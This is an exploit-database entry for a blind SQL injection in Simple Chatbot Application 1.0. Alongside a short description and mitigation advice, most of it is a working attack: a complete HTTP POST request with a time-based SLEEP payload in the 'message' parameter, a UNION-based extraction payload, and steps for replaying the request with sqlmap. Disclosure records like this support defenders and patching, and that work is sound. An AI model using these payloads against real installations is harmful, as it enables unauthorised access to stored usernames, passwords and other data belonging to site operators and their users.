header-logo
Suggest Exploit
vendor:
Simple Chatbot Application
by:
Saud Alenazi
8.8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Simple Chatbot Application
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:sourcecodester:simple_chatbot_application:1.0
Metasploit:
Other Scripts:
Platforms Tested: XAMPP, Windows 10
2022

Simple Chatbot Application 1.0 – ‘message’ Blind SQLi

Simple Chatbot Application 1.0 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the application. The request contains a malicious SQL query in the 'message' parameter. The application does not properly sanitize user input, allowing an attacker to inject malicious SQL code into the query. This can be used to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi
# Date: 18/01/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10

# Steps
# Go to : http://127.0.0.1/classes/Master.php?f=get_response
# Save request in BurpSuite
# Run saved request with sqlmap -r sql.txt

======

POST /classes/Master.php?f=get_response HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 73
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud

======

#Payloads

#Payload (UNION query)
message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- -

#(AND/OR time-based blind)
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud